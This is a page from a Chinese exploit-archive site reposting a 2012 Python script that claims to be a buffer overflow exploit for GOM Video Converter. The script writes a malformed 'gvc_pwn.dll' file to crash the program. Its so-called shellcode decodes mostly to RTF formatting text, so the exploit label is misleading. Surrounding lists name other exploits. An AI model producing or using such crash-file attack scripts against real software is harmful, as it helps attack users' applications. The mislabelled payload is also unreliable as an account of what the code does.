首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
GOM Video Converter Buffer Overflow
来源:vfocus.net 作者:Gobejishvili 发布时间:2012-11-08  
#!/usr/bin/python
#=============================================================#
# GOM Video Converter .dll Buffer Overflow Exploit
#
# Downloaded from: http://converter.gomlab.com/eng/download/
#
# 11/06/2012
#
# Ucha Gobejishvili
#
# Tested Platform: Windows 7
#=============================================================#
import os

evilfile = "gvc_pwn.dll"
shellcode = ("\x7b\x5c\x72\x74\x46\x31\x23\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x68\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x73\x68\x70\x69\x6e\x73\x74\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x73\x70\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x7d\x7b\x5c\x2a\x5c\x67\x65\x6e\x65\x72\x61\x74\x6f\x72\x20\x4d\x73\x66\x74\x65\x64\x69\x74\x20\x35\x2e\x34\x31\x2e\x31\x35\x2e\x31\x35\x30\x37\x3b\x7d\x0b\x69\x65\x77\x6b\x69\x6e\x64\x34\x5c\x75\x63\x31\x5c\x70\x61\x72\x64\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x7b\x5c\x2a\x5c\x70\x6e\x5c\x70\x6e\x6c\x76\x6c\x62\x6c\x74\x5c\x70\x6e\x66\x32\x5c\x70\x6e\x69\x6e\x64\x65\x6e\x74\x30\x7b\x5c\x70\x6e\x74\x78\x74\x62\x27\x42\x37\x7d\x7d\x0c\x69\x2d\x37\x32\x30\x5c\x6c\x69\x37\x32\x30\x5c\x71\x63\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x30\x0c\x73\x32\x30\x20\x35\x2f\x32\x38\x2f\x32\x30\x31\x31\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x5c\x70\x61\x72\x5c\x63\x66\x31\x5c\x75\x6c\x08\x5c\x69\x0c\x31\x0c\x73\x34\x30\x7b\x5c\x70\x6e\x74\x65\x78\x74\x0c\x32\x27\x42\x37\x09\x61\x62\x7d\x48\x49\x20\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x2e\x5c\x63\x66\x30\x5c\x75\x6c\x6e\x6f\x6e\x65\x08\x30\x5c\x69\x30\x0c\x30\x0c\x73\x32\x30\x5c\x70\x61\x72\x7b\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x5c\x2a\x7d")
crashy = open(evilfile,"w")
crashy.write(shellcode)
crashy.close()

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·BigAnt Server 2.52 Stack Overf
·LibreOffice Suite 3.5.5.3 Deni
·WinRM VBS Remote Code Executio
·Invision Power Board 3.3.4 Uns
·EMC Networker Format String
·Microsoft Office Excel 2007 Wr
·Zoner Photo Studio 15 Buffer O
·KMPlayer v3.3.0.33 Multiple Vu
·Microsoft Office Excel 2013 me
·Microsoft Publisher 2013 memor
·BigAnt Server 2.52 SP5 SEH Sta
·Microsoft Visio 2010 memory co
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved